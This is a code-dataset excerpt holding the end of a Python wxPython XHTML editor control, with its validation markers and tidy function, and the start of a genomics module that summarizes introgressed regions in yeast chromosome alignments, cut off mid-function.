self._getStcControl().GetSelectedText()\r\n        return ZStyledXhtmlEditControlFindReplaceTextContext(self._getStcControl(), selectedText)\r\n    # end createFindReplaceContext()\r\n\r\n    def _wrapSelectionWithTag(self, tag, style = None):\r\n        s = u\"\" #$NON-NLS-1$\r\n        startTag = tag\r\n        if style and tag:\r\n            startTag = tag + u' style=\"%s\" ' % style #$NON-NLS-1$\r\n        posOffset = 0\r\n        if self.hasSelection() and tag:\r\n            s = u\"<%s>%s</%s>\" % (startTag, self._getStcControl().GetSelectedText(), tag) #$NON-NLS-1$\r\n        elif tag:\r\n            s = u\"<%s></%s>\" % (startTag, tag) #$NON-NLS-1$\r\n            posOffset = len(startTag) + 2\r\n        self._insertHtml(s, posOffset)\r\n    #end _wrapSelectionWithTag()\r\n\r\n    def _insertHtml(self, html, posOffset):\r\n        if not html:\r\n            return\r\n        pos = self._getStcControl().GetCurrentPos()\r\n        if self.hasSelection():\r\n            self._getStcControl().ReplaceSelection(html)\r\n        else:\r\n            self._getStcControl().AddText(html)\r\n        if posOffset > 0:\r\n            self._getStcControl().EnsureCaretVisible()\r\n            self._getStcControl().SetCurrentPos(pos + posOffset)\r\n            pos = self._getStcControl().GetCurrentPos()\r\n            self._getStcControl().SetSelectionStart(pos)\r\n            self._getStcControl().EnsureCaretVisible()\r\n    # end _insertHtml()\r\n\r\n    def onMarginClick(self, evt):\r\n        self._resetMarkerHighLighting()\r\n        if evt.GetMargin() == 1:\r\n            pos = evt.GetPosition()\r\n            line = self._getStcControl().LineFromPosition(evt.GetPosition())\r\n            self._handleMarkerMarginClicked(pos, line)\r\n        evt.Skip()\r\n    # end onMarginClick\r\n\r\n    def _handleMarkerMarginClicked(self, pos, line): #@UnusedVariable\r\n        # called when the user clicked on a marker on the margin.\r\n        self._highlightMarkerLine(-1)\r\n        # find marker by line number:\r\n        line = line + 1 # adjust for 0 based index\r\n        for zxhtmlValidationMessage in self.validationReportProvider.getValidationMessages(): #@UnusedVariable\r\n            if zxhtmlValidationMessage.getLine() == line:\r\n                # FIXME highlight message in list control\r\n                pass\r\n    # end _handleMarkerMarginClicked\r\n\r\n    def _highlightMarkerLine(self, aLineNum, aColNum=-1):\r\n        self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_ARROW)\r\n        if aLineNum < 0:\r\n            return\r\n\r\n        self._getStcControl().MarkerAdd(aLineNum, 
IZZStyledTextCtrlMarkers.MARKER_ARROW)\r\n self._getStcControl().EnsureCaretVisible()\r\n pos = self._getStcControl().PositionFromLine(aLineNum)\r\n if aColNum >= 0:\r\n p = pos + aColNum\r\n if p <= self._getStcControl().GetTextLength():\r\n pos = p\r\n self._getStcControl().SetCurrentPos(pos)\r\n self._getStcControl().SetSelectionStart(pos)\r\n self._getStcControl().EnsureCaretVisible()\r\n self._getStcControl().SetCaretLineBack(wx.Colour(red=255, green=255, blue=102))\r\n self._getStcControl().SetCaretLineVisible(True)\r\n # end _highlightMarkerLine()\r\n\r\n def _resetMarkerHighLighting(self):\r\n if self._getStcControl().GetCaretLineVisible():\r\n self._getStcControl().SetCaretLineVisible(False)\r\n # end _resetMarkerHighLighting()\r\n\r\n def _clearAllMarkers(self):\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_NONE)\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_OK)\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_WARN)\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_ERROR)\r\n self._getStcControl().MarkerDeleteAll(IZZStyledTextCtrlMarkers.MARKER_ARROW)\r\n self._resetMarkerHighLighting()\r\n # end _clearAllMarkers()\r\n\r\n def _addValidationMessageMarker(self, zxhtmlValidationMessage):\r\n if not zxhtmlValidationMessage:\r\n return\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_NONE\r\n if zxhtmlValidationMessage.getSeverity() == ZXhtmlValidationMessage.SUCCESS:\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_OK\r\n elif zxhtmlValidationMessage.getSeverity() == ZXhtmlValidationMessage.WARNING:\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_WARN\r\n elif zxhtmlValidationMessage.getSeverity() == ZXhtmlValidationMessage.ERROR:\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_ERROR\r\n elif zxhtmlValidationMessage.getSeverity() == ZXhtmlValidationMessage.FATAL:\r\n symbol = IZZStyledTextCtrlMarkers.MARKER_ERROR\r\n\r\n if zxhtmlValidationMessage.getLine() > 0:\r\n self._getStcControl().MarkerAdd(zxhtmlValidationMessage.getLine() - 1, symbol)\r\n # end _addValidationMessageMarker()\r\n\r\n def schemaValidate(self):\r\n # IZXHTMLEditControl impl.\r\n fireUIExecEvent(ZMethodRunnable(self._showViewAndRunValidation), self)\r\n # end schemaValidate\r\n\r\n def _showValidationView(self):\r\n if not self.validationView.IsShown():\r\n self.validationView.Show(True)\r\n self.Layout()\r\n # end _showValidationView\r\n\r\n def _hideValidationView(self):\r\n if self.validationView.IsShown():\r\n self.validationView.Show(False)\r\n self.Layout()\r\n # end _hideValidationView\r\n\r\n def _showViewAndRunValidation(self):\r\n self._showValidationView()\r\n fireUIExecEvent(ZMethodRunnable(self._runValidation), self)\r\n # end _showViewAndRunValidation\r\n\r\n def _runValidation(self):\r\n self._clearValidation()\r\n ZXhtmlSchemaUiUtil().validateHtmlBody(None, self.getValue(), self )\r\n # end _runValidation\r\n\r\n def _clearValidation(self):\r\n # IZXHTMLEditControl impl.\r\n self._clearAllMarkers()\r\n self.validationReportProvider.clearValidationMessages()\r\n self.validationView.getListControl().refresh()\r\n # end _clearValidation\r\n\r\n def clearValidation(self):\r\n # IZXHTMLEditControl impl.\r\n self._clearValidation()\r\n self._hideValidationView()\r\n # end clearValidation\r\n\r\n def runTidy(self):\r\n # IZXHTMLEditControl impl.\r\n fireUIExecEvent(ZMethodRunnable(self._internalRunTidy), self)\r\n # end runTidy\r\n\r\n def _internalRunTidy(self):\r\n self._showValidationView()\r\n 
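# NOTE (added): drop any stale markers and validation messages so the report\r\n        # view only reflects this tidy pass.\r\n        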
self._clearValidation()\r\n (success, htmlResult, messageList) = ZXhtmlSchemaUiUtil().tidyHtmlBody(None, self.getValue(), self ) #@UnusedVariable\r\n if success:\r\n self._getStcControl().SetText(htmlResult)\r\n # end _internalRunTidy\r\n\r\n def onValidationItemSelected(self, event):\r\n index = event.GetIndex()\r\n zxhtmlValidationMessage = self.validationReportProvider.getValidationMessage(index)\r\n if zxhtmlValidationMessage:\r\n self._highlightMarkerLine(zxhtmlValidationMessage.getLine()-1, zxhtmlValidationMessage.getColumn())\r\n # end onValidationItemSelected\r\n\r\n def onValidationItemActivated(self, event): #@UnusedVariable\r\n pass\r\n # end onValidationItemActivated\r\n\r\n def onXhtmlValidationStart(self):\r\n pass\r\n # end onXhtmlValidationStart\r\n\r\n def onXhtmlValidationEnd(self, messageCount):\r\n if messageCount == 0:\r\n m = ZXhtmlValidationMessage(ZXhtmlValidationMessage.SUCCESS, -1,-1, u\"Completed successfully.\") #$NON-NLS-1$\r\n self.validationReportProvider.addValidationMessage(m)\r\n else:\r\n m = ZXhtmlValidationMessage(ZXhtmlValidationMessage.ERROR, -1, -1, u\"Completed with problems.\") #$NON-NLS-1$\r\n self.validationReportProvider.addValidationMessage(m)\r\n self.validationView.getListControl().refresh()\r\n # end onXhtmlValidationEnd\r\n\r\n def onXhtmlValidationMessage(self, zxhtmlValidationMessage): #@UnusedVariable\r\n self.validationReportProvider.addValidationMessage(zxhtmlValidationMessage)\r\n self._addValidationMessageMarker(zxhtmlValidationMessage)\r\n # end onXhtmlValidationMessage\r\n\r\n def onXhtmlValidationException(self, exception): #@UnusedVariable\r\n pass\r\n # end onXhtmlValidationException\r\n\r\n# end ZStyledXhtmlEditControl\r\n","sub_path":"src/python/zoundry/appframework/ui/widgets/controls/advanced/stc/stceditor.py","file_name":"stceditor.py","file_ext":"py","file_size_in_byte":32252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"75729381","text":"from __future__ import annotations\nimport bisect\nimport gzip\nimport numpy as np\nimport pickle\nfrom contextlib import ExitStack\nimport click\nimport logging as log\nfrom collections import Counter\nfrom misc import read_fasta\nfrom misc import read_table\nfrom misc import seq_functions\nfrom typing import List, Tuple, Dict\nfrom analyze.introgression_configuration import Configuration\n\n\ncen_starts = [151465, 238207, 114385, 449711, 151987, 148510,\n 496920, 105586, 355629, 436307, 440129, 150828,\n 268031, 628758, 326584, 555957]\ncen_starts = [x-1 for x in cen_starts]\n\ncen_ends = [151582, 238323, 114501, 449821, 152104, 148627,\n 497038, 105703, 355745, 436425, 440246, 150947,\n 268149, 628875, 326702, 556073]\ncen_ends = [x-1 for x in cen_ends]\n\ntel_coords = [1, 801, 229411, 230218,\n 1, 6608, 812379, 813184,\n 1, 1098, 315783, 316620,\n 1, 904, 1524625, 1531933,\n 1, 6473, 569599, 576874,\n 1, 5530, 269731, 270161,\n 1, 781, 1083635, 1090940,\n 1, 5505, 556105, 562643,\n 1, 7784, 439068, 439888,\n 1, 7767, 744902, 745751,\n 1, 807, 665904, 666816,\n 1, 12085, 1064281, 1078177,\n 1, 6344, 923541, 924431,\n 1, 7428, 783278, 784333,\n 1, 847, 1083922, 1091291,\n 1, 7223, 942396, 948010]\ntel_coords = [x-1 for x in tel_coords]\n\ntel_left_starts = [tel_coords[i] for i in range(0, len(tel_coords), 4)]\ntel_left_ends = [tel_coords[i] for i in range(1, len(tel_coords), 4)]\ntel_right_starts = [tel_coords[i] for i in range(2, len(tel_coords), 4)]\ntel_right_ends = [tel_coords[i] for i in range(3, len(tel_coords), 
4)]\n\nchromosomes = ('I II III IV V '\n 'VI VII VIII IX X '\n 'XI XII XIII XIV XV XVI').split()\n\n\ndef distance_from_telomere(start, end, chrm):\n\n assert start <= end, str(start) + ' ' + str(end)\n\n i = chromosomes.index(chrm)\n # region entirely on left arm\n if end <= cen_starts[i]:\n return start - tel_left_ends[i]\n # region entirely on right arm\n if start >= cen_ends[i]:\n return tel_right_starts[i] - end\n # region overlaps centromere: return minimum distance from either telomere\n return min(start - tel_left_ends[i], tel_right_starts[i] - end)\n\n\ndef distance_from_centromere(start, end, chrm):\n\n assert start <= end, str(start) + ' ' + str(end)\n\n i = chromosomes.index(chrm)\n # region entirely on left arm\n if end <= cen_starts[i]:\n return cen_starts[i] - end\n # region entirely on right arm\n if start >= cen_ends[i]:\n return start - cen_ends[i]\n # region overlaps centromere: return 0\n return 0\n\n\ndef write_region_summary_plus(fn, regions, fields):\n f = open(fn, 'w')\n f.write('region_id\\t' + '\\t'.join(fields) + '\\n')\n keys = sorted(regions.keys(), key=lambda x: int(x[1:]))\n for region_id in keys:\n f.write(region_id + '\\t')\n f.write('\\t'.join([str(regions[region_id][field])\n for field in fields]))\n f.write('\\n')\n f.close()\n\n\ndef gap_columns(seqs):\n g = 0\n for i in range(len(seqs[0])):\n for seq in seqs:\n if seq[i] == '-': # gp.gap_symbol:\n g += 1\n break\n return g\n\n\ndef longest_consecutive(s, c):\n max_consecutive = 0\n current_consecutive = 0\n in_segment = False\n for i in range(len(s)):\n if s[i] == c:\n current_consecutive += 1\n in_segment = True\n else:\n if in_segment:\n max_consecutive = max(max_consecutive, current_consecutive)\n current_consecutive = 0\n in_segment = False\n return max_consecutive\n\n\ndef masked_columns(seqs):\n # return two things:\n # - number of columns that are masked in any sequence\n # - above, but excluding columns with gaps\n num_seqs = len(seqs)\n num_sites = len(seqs[0])\n mask_total = 0\n mask_non_gap_total = 0\n for ps in range(num_sites):\n mask = False\n gap = False\n for s in range(num_seqs):\n if seqs[s][ps] == '-': # gp.gap_symbol:\n gap = True\n elif seqs[s][ps] == 'x': # gp.masked_symbol:\n mask = True\n if mask:\n mask_total += 1\n if not gap:\n mask_non_gap_total += 1\n return mask_total, mask_non_gap_total\n\n\ndef index_by_reference(ref_seq, seq):\n # return dictionary keyed by reference index, with value the\n # corresponding index in non-reference sequence\n\n d = {}\n ri = 0\n si = 0\n for i in range(len(ref_seq)):\n if ref_seq[i] != '-': # gp.gap_symbol:\n d[ri] = si\n ri += 1\n if seq[i] != '-': # gp.gap_symbol:\n si += 1\n return d\n\n\ndef num_sites_between(sites, start, end):\n # sites are sorted\n i = bisect.bisect_left(sites, start)\n j = bisect.bisect_right(sites, end)\n return j - i, sites[i:j]\n\n\nclass Summarizer():\n '''\n Summarize region quality of each region\n '''\n def __init__(self, configuration: Configuration):\n self.config = configuration\n\n def validate_arguments(self):\n '''\n Check that all required instance variables are set to perform a\n summarize run. 
Returns true if valid, raises value error otherwise\n '''\n args = [\n 'chromosomes',\n 'labeled_blocks',\n 'quality_blocks',\n 'masks',\n 'alignment',\n 'positions',\n 'regions',\n 'region_index',\n 'known_states',\n 'unknown_states',\n 'states',\n 'symbols'\n ]\n variables = self.config.__dict__\n for arg in args:\n if arg not in variables or variables[arg] is None:\n err = ('Failed to validate Summarizer, required argument '\n f\"'{arg}' was unset\")\n log.exception(err)\n raise ValueError(err)\n\n reference = self.config.get('analysis_params.reference')\n if reference is None:\n err = f'Configuration did not specify a reference strain'\n log.exception(err)\n raise ValueError(err)\n\n return True\n\n def run(self, states: List[str] = None):\n '''\n Summarize region quality of each region for the states specified\n '''\n ref_ind, states = self.states_to_process(states)\n\n log.debug(f'reference index: {ref_ind}')\n log.debug(f'states to analyze: {states}')\n\n known_states = self.config.known_states\n log.debug(f'known_states {known_states}')\n\n analyzer = Sequence_Analyzer(\n self.config.masks,\n self.config.alignment,\n self.config.known_states,\n self.config.interval_states,\n self.config.chromosomes,\n self.config.symbols)\n\n log.debug(f'Sequence_Analyzer init with:')\n log.debug(f'masks: {self.config.masks}')\n log.debug(f'alignment: {self.config.alignment}')\n\n analyzer.build_masked_sites()\n\n for ind, state in enumerate(states):\n log.info(f'Working on state {state}')\n state_ind = self.config.states.index(state)\n\n with Position_Reader(\n self.config.positions\n ) as positions,\\\n Region_Writer(\n self.config.regions.format(state=state),\n self.config.region_index.format(state=state),\n known_states\n ) as region_writer,\\\n Quality_Writer(\n self.config.quality_blocks.format(state=state)\n ) as quality_writer,\\\n ExitStack() as stack:\n\n progress_bar = None\n if self.config.log_file:\n progress_bar = stack.enter_context(\n click.progressbar(\n length=len(self.config.chromosomes),\n label=f'State {ind+1} of {len(states)}'))\n\n for chrm in self.config.chromosomes:\n log.info(f'Working on chromosome {chrm}')\n region = Region_Database(\n self.config.labeled_blocks.format(state=state),\n chrm,\n known_states)\n\n for strain, ps in positions.get_positions(region, chrm):\n log.debug(f'{strain} {chrm}')\n\n analyzer.process_alignment(ref_ind,\n state_ind,\n chrm,\n strain,\n ps,\n region,\n region_writer)\n\n quality_writer.write_quality(region)\n\n if progress_bar:\n progress_bar.update(1)\n\n def states_to_process(self,\n states: List[str] = None) -> Tuple[int,\n List[str]]:\n '''\n Set the states to summarize to the values passed in.\n If no values are specified, run all states in config\n Checks if states are in config, warning if a state is not\n found and raising an error if none of the states are in config.\n '''\n reference = self.config.get('analysis_params.reference.name')\n ref_ind = self.config.states.index(reference)\n\n if states is None or states == []:\n to_process = self.config.states\n\n else:\n to_process = []\n for s in states:\n if s in self.config.states:\n to_process.append(s)\n else:\n log.warning(f\"state '{s}' was not found as a state\")\n\n if to_process == []:\n err = 'No valid states were found to process'\n log.exception(err)\n raise ValueError(err)\n\n return ref_ind, to_process\n\n\nclass Flag_Info():\n '''\n Collection of boolean flags for sequence summary\n '''\n def __init__(self):\n self.gap_any = None\n self.mask_any = None\n self.unseq_any 
= None\n        self.hmm = None\n        self.gap = None\n        self.mask = None\n        self.unseq = None\n        self.match = None\n\n    def initialize_flags(self, number_sequences: int, number_states: int):\n        '''\n        Initialize internal flags to np arrays of false\n        '''\n        self.gap_any = np.zeros((number_sequences), bool)\n        self.mask_any = np.zeros((number_sequences), bool)\n        self.unseq_any = np.zeros((number_sequences), bool)\n        self.gap = np.zeros((number_sequences, number_states), bool)\n        self.mask = np.zeros((number_sequences, number_states), bool)\n        self.unseq = np.zeros((number_sequences, number_states), bool)\n        self.match = np.zeros((number_sequences, number_states), bool)\n\n    def add_sequence_flags(self, other: Flag_Info, state: int):\n        '''\n        Join the other flag info with this info by replacing values\n        in the gap, unseq, and match arrays and performing OR with anys\n        '''\n        # only write the first time\n        if state == 0:\n            self.hmm = other.hmm\n\n        self.gap_any = np.logical_or(self.gap_any, other.gap)\n        self.unseq_any = np.logical_or(self.unseq_any, other.unseq)\n\n        self.gap[:, state] = other.gap\n        self.unseq[:, state] = other.unseq\n        self.match[:, state] = other.match\n\n    def add_mask_flags(self, other: Flag_Info, state: int):\n        '''\n        Join the other flag info with this by replacing values in mask and\n        performing an OR with mask_any\n        '''\n        self.mask_any = np.logical_or(self.mask_any, other.mask)\n        self.mask[:, state] = other.mask\n\n    def encode_info(self,\n                    master_ind: int,\n                    predict_ind: int) -> str:\n        '''\n        Summarize info flags into a string. master_ind is the index of\n        the master reference state. predict_ind is the index of the predicted\n        state. The return string is encoded for each position as:\n        '-': if either master or predict has a gap\n        '_': if either master or predict is masked\n        '.': if all states match\n        'b': both predict and master match\n        'c': master matches but not predict\n        'p': predict matches but not master\n        'x': no other condition applies\n        if the position is in the hmm_flag\n        it will be capitalized for x, p, c, or b\n        in order of precedence, e.g. if a position satisfies both '-' and '.',\n        it will be '-'.\n        '''\n\n        if predict_ind >= self.match.shape[1]:\n            return self.encode_unknown_info(master_ind)\n\n        decoder = np.array(list('xXpPcCbB._-'))\n        indices = np.zeros(self.match.shape[0], int)\n\n        indices[self.match[:, predict_ind]] += 2  # x to p if true\n        indices[self.match[:, master_ind]] += 4  # x to c, p to b\n        indices[self.hmm] += 1  # to upper\n\n        matches = np.all(self.match, axis=1)\n        indices[matches] = 8  # .\n        indices[np.any(\n            self.mask[:, [master_ind, predict_ind]],\n            axis=1)] = 9  # _\n        indices[np.any(\n            self.gap[:, [master_ind, predict_ind]],\n            axis=1)] = 10  # -\n\n        return ''.join(decoder[indices])\n\n    def encode_unknown_info(self,\n                            master_ind: int) -> str:\n        '''\n        Summarize info dictionary into a string for unknown state.\n        master_ind is the index of the master reference state.\n        The return string is encoded at each position as:\n        '-': if any state has a gap\n        '_': if any state has a mask\n        '.': all states match\n        'x': master matches\n        'X': no other condition applies\n        in order of precedence, e.g. 
if a position satisfies both '-' and '.',\n it will be '-'.\n '''\n\n # used with indices to decode result\n decoder = np.array(list('Xx._-'))\n indices = np.zeros(self.gap_any.shape, int)\n\n indices[self.match[:, master_ind]] = 1 # x\n matches = np.all(self.match, axis=1)\n indices[matches] = 2 # .\n indices[self.mask_any] = 3 # _\n indices[self.gap_any] = 4 # -\n\n return ''.join(decoder[indices])\n\n\nclass Sequence_Analyzer():\n '''\n Performs handling of masking, reading, and analyzing sequence data for\n summarizing the sequences\n '''\n def __init__(self,\n mask_file: str,\n alignment_file: str,\n known_states: List,\n interval_states: List,\n chromosomes: List,\n symbols: Dict):\n self.masks = mask_file\n self.alignments = alignment_file\n self.known_states = known_states\n self.interval_states = interval_states\n self.chromosomes = chromosomes\n self.symbols = symbols\n\n def build_masked_sites(self):\n '''\n Read in all intervals files and return dictionary of intervals,\n keyed first by chromosome, then state\n '''\n result = {}\n for chrom in self.chromosomes:\n result[chrom] = {}\n for state, name in zip(self.known_states, self.interval_states):\n result[chrom][state] = self.read_masked_sites(chrom, name)\n\n self.masked_sites = result\n\n def read_masked_sites(self, chrom: str, strain: str) -> np.array:\n filename = self.masks.format(chrom=chrom, strain=strain)\n intervals = self.read_masked_intervals(filename)\n sites = self.convert_intervals_to_sites(intervals)\n return sites\n\n def convert_intervals_to_sites(self,\n intervals: List[Tuple]) -> np.array:\n '''\n Given a list of start, end positions, returns a 1D np.array of sites\n contained in the intervals List\n convert_intervals_to_sites([(1, 2), (4, 6)]) -> [1, 2, 4, 5, 6]\n '''\n sites = []\n for start, end in intervals:\n sites += range(start, end + 1)\n return np.array(sites, dtype=int)\n\n def read_masked_intervals(self,\n filename: str) -> List[Tuple[int, int]]:\n '''\n Read the interval file provided and return start and end sequences\n as a list of tuples of 2 ints\n '''\n with open(filename, 'r') as reader:\n reader.readline() # header\n intervals = []\n for line in reader:\n line = line.split()\n intervals.append((int(line[0]), int(line[2])))\n\n return intervals\n\n def get_stats(self,\n current_sequence,\n other_sequence,\n slice_start,\n aligned_index_positions,\n masked_site):\n '''\n Helper function to perform analyses on the sequences returning\n the results of seq_id_hmm, seq_id, and seq_id_unmasked\n '''\n\n # only alignment columns used by HMM (polymorphic, no\n # gaps in any strain)\n hmm_stats = self.seq_id_hmm(other_sequence,\n current_sequence,\n slice_start,\n aligned_index_positions)\n\n # all alignment columns, excluding ones with gaps in\n # these two sequences\n nongap_stats = seq_functions.seq_id(other_sequence,\n current_sequence)\n\n # all alignment columns, excluding ones with gaps or\n # masked bases or unsequenced in *these two sequences*\n nonmask_stats = self.seq_id_unmasked(other_sequence,\n current_sequence,\n slice_start,\n masked_site[0],\n masked_site[1])\n\n return hmm_stats, nongap_stats, nonmask_stats\n\n def seq_id_hmm(self,\n seq1: np.array,\n seq2: np.array,\n offset: int,\n include_sites: List[int]) -> Tuple[\n int, int, Flag_Info]:\n '''\n Compare two sequences and provide statistics of their overlap\n considering only the included sites.\n Takes the two sequences to consider, an offset of the included sites,\n and a list of the included sites.\n Returns:\n -the total 
number of matching sites, where seq1[i] == seq2[i] and\n        i is an element in included_sites - offset\n        -the total number of sites considered in the included sites, e.g. where\n        included_sites - offset >= 0 and < len(seq)\n        -a Flag_Info object with:\n        -gap: true where seq1 or seq2 == gap_symbol\n        -unseq: true where seq1 or seq2 == unsequenced_symbol\n        -hmm: true at index i where i is in included_sites - offset\n        -match: true where seq1 == seq2, regardless of symbol\n        '''\n        sites = np.array(include_sites) - offset\n\n        info = Flag_Info()\n        info.gap = np.logical_or(seq1 == self.symbols['gap'],\n                                 seq2 == self.symbols['gap'])\n        info.unseq = np.logical_or(seq1 == self.symbols['unsequenced'],\n                                   seq2 == self.symbols['unsequenced'])\n        info.match = seq1 == seq2\n        info.hmm = np.zeros(info.match.shape, bool)\n        sites = sites[np.logical_and(sites < len(info.match), sites >= 0)]\n        info.hmm[sites] = True\n\n        total_sites = np.sum(info.hmm)\n        total_match = np.sum(np.logical_and(info.hmm, info.match))\n\n        # check all included are not gapped or skipped\n        include_in_skip = np.logical_and(\n            info.hmm, np.logical_or(\n                info.unseq, info.gap))\n        if np.any(include_in_skip):\n            ind = np.where(include_in_skip)[0][0]\n            err = ('Need to skip site specified as included '\n                   f'seq1: {seq1[ind]}, seq2: {seq2[ind]}, index: {ind}')\n            log.exception(err)\n            raise ValueError(err)\n\n        return total_match, total_sites, info\n\n    def seq_id_unmasked(self,\n                        seq1: np.array,\n                        seq2: np.array,\n                        offset: int,\n                        exclude_sites1: List[int],\n                        exclude_sites2: List[int]) -> Tuple[\n                            int, int, Flag_Info]:\n        '''\n        Compare two sequences and provide statistics of their overlap\n        considering only the non-excluded sites.\n        Takes two sequences and an offset applied to each excluded sites list.\n        Returns:\n        -total number of matching sites in non-excluded sites. 
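For example, with offset 10 and exclude_sites1 = [12],\n        index 2 of the sequence slice is excluded. 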
A position is\n excluded if it is an element of either excluded site list - offset,\n or it is a gap or unsequenced symbol in either sequence.\n -total number of non-excluded sites\n A Flag_Info object with:\n -mask_flag: a boolean array that is true if the position is in\n either excluded list - offset\n '''\n info = Flag_Info()\n info.gap = np.logical_or(seq1 == self.symbols['gap'],\n seq2 == self.symbols['gap'])\n info.unseq = np.logical_or(seq1 == self.symbols['unsequenced'],\n seq2 == self.symbols['unsequenced'])\n exclude_sites1 = np.array(exclude_sites1)\n exclude_sites2 = np.array(exclude_sites2)\n\n # convert offset excluded sites to boolean array\n info.mask = np.zeros(seq1.shape, bool)\n if exclude_sites1.size != 0:\n sites1 = exclude_sites1 - offset\n sites1 = sites1[np.logical_and(sites1 < len(info.gap),\n sites1 >= 0)]\n info.mask[sites1] = True\n\n if exclude_sites2.size != 0:\n sites2 = exclude_sites2 - offset\n sites2 = sites2[np.logical_and(sites2 < len(info.gap),\n sites2 >= 0)]\n info.mask[sites2] = True\n\n # find sites that are not masked, gapped, or unsequenced\n sites = np.logical_not(\n np.logical_or(\n info.mask,\n np.logical_or(\n info.gap, info.unseq)))\n\n # determine totals\n total_sites = np.sum(sites)\n total_match = np.sum(\n np.logical_and(\n seq1 == seq2,\n sites))\n\n return total_match, total_sites, info\n\n def process_alignment(self,\n reference_index: int,\n state_index: int,\n chromosome: str,\n strain: str,\n positions: np.array,\n region: Region_Database,\n region_writer: Region_Writer):\n '''\n Analyze the alignment of a given strain, chromosome, and position.\n Result is stored in the provided region database\n '''\n sequences, alignments, masked_sites = self.get_indices(chromosome,\n strain)\n\n # convert position indices from indices in master reference to\n # indices in alignment\n ps_align = alignments[reference_index][positions]\n\n for i, (r_id, start, end) in enumerate(region.get_entries(strain)):\n start, end = self.get_slice(start, end,\n alignments[reference_index],\n ps_align)\n\n info = Flag_Info()\n info.initialize_flags(\n end - start + 1,\n len(self.known_states))\n\n for ind, state in enumerate(self.known_states):\n hmm, nongap, nonmask = self.get_stats(\n sequences[-1][start:end + 1],\n sequences[ind][start:end + 1],\n start,\n ps_align,\n (masked_sites[ind],\n masked_sites[-1]))\n\n region.set_region(strain, i, state,\n hmm,\n nongap,\n nonmask)\n\n info.add_sequence_flags(hmm[2], ind)\n info.add_mask_flags(nonmask[2], ind)\n\n info_string = info.encode_info(reference_index, state_index)\n\n region_writer.write_header(r_id)\n region_writer.write_sequences(\n strain,\n alignments,\n sequences,\n (start, end))\n region_writer.write_info_string(info_string)\n\n # and keep track of each symbol count\n region.update_counts(strain, i, info_string)\n\n def get_indices(self, chromosome: str, strain: str) -> Tuple:\n '''\n Get the sequences and different indices for the provided\n chromosome and strain\n Returned tuple contains:\n -sequences as np.array\n -index alignment list of indices for each sequence\n -masked_sites, index aligned for each sequence\n '''\n _, sequences = read_fasta.read_fasta(\n self.alignments.format(chrom=chromosome, strain=strain))\n\n # to go from index in reference seq to index in alignment\n alignments = [\n self.index_alignment_by_reference(seq)\n for seq in sequences\n ]\n\n masked = self.read_masked_sites(chromosome, strain)\n\n masked_sites = [\n alignments[ind][self.masked_sites[chromosome][state]]\n for 
ind, state in enumerate(self.known_states)\n ] + [alignments[-1][masked]] # for strain\n\n return sequences, alignments, masked_sites\n\n def index_alignment_by_reference(self, sequence: np.array) -> np.array:\n '''\n Find locations of non-gapped sites in sequence\n want a way to go from reference sequence coordinate to index in\n alignment\n '''\n return np.where(sequence != self.symbols['gap'])[0]\n\n def get_slice(self,\n start: int,\n end: int,\n alignment: np.array,\n ps_align: np.array) -> Tuple[int, int]:\n '''\n Get start and end positions of index aligned sequence.\n Checks that positions are valid (in ps_align), and raises\n value errors otherwise\n '''\n # index of start and end of region in aligned sequences\n slice_start, slice_end = alignment[[start, end]]\n\n if not np.in1d([slice_start, slice_end], ps_align).all():\n err = 'Slice not found in position alignment'\n log.exception(err)\n raise ValueError(err)\n\n return slice_start, slice_end\n\n\nclass Region_Database():\n '''\n Contains data and logic for regions data during summarizing\n '''\n def __init__(self,\n labeled_file: str,\n chromosome: str,\n known_states: List[str]):\n '''\n Read in labeled file and store resulting table and labels\n '''\n self.info_string_symbols = list('.-_npbcxNPBCX')\n\n self.label_prefixes = ['match_nongap',\n 'num_sites_nongap',\n 'match_hmm',\n 'match_nonmask',\n 'num_sites_nonmask']\n\n self.data, self.labels = read_table.read_table_columns(\n labeled_file,\n sep='\\t',\n group_by='strain',\n chromosome=chromosome)\n\n if self.labels[0] != 'region_id':\n err = 'Unexpected labeled format'\n log.exception(err)\n raise ValueError(err)\n\n for strain, data in self.data.items():\n n = len(data['region_id'])\n\n for s in known_states:\n for lbl in self.label_prefixes:\n data[f'{lbl}_{s}'] = [0] * n\n\n for s in self.info_string_symbols:\n data['count_' + s] = [0] * n\n\n self.labels += [f'{lbl}_{st}' for lbl in self.label_prefixes\n for st in known_states]\n self.labels += ['count_' + x for x in self.info_string_symbols]\n\n def has_strain(self, strain: str) -> bool:\n '''\n Checks if the strain is in this database\n '''\n return strain in self.data\n\n def get_entries(self, strain: str) -> Tuple[str, int, int]:\n '''\n returns an iterator for the region entries of the strain\n with region id (string), start (int) and end (int) positions\n '''\n if not self.has_strain(strain):\n err = f'Region Database does not contain strain {strain}'\n log.exception(err)\n raise ValueError(err)\n\n r_ids = self.data[strain]['region_id']\n starts = self.data[strain]['start']\n ends = self.data[strain]['end']\n for i in range(len(r_ids)):\n yield (r_ids[i], int(starts[i]), int(ends[i]))\n\n def set_region(self,\n strain: str,\n index: int,\n state: str,\n hmm, nongap, nonmask):\n '''\n Set the region state with the provided values.\n hmm, nongap and nonmask are tuples of the (match, total) values\n '''\n ds = self.data[strain]\n MATCH, TOTAL = 0, 1\n if hmm[TOTAL] is not None:\n ds['num_sites_hmm'][index] = hmm[TOTAL]\n\n ds[f'match_hmm_{state}'][index] = hmm[MATCH]\n\n ds[f'match_nongap_{state}'][index] = nongap[MATCH]\n ds[f'num_sites_nongap_{state}'][index] = nongap[TOTAL]\n\n ds[f'match_nonmask_{state}'][index] = nonmask[MATCH]\n ds[f'num_sites_nonmask_{state}'][index] = nonmask[TOTAL]\n\n def update_counts(self,\n strain: str,\n index: int,\n info_string: str):\n '''\n Update the counts variables based on the provided info string\n '''\n counts = Counter(info_string)\n for sym in 
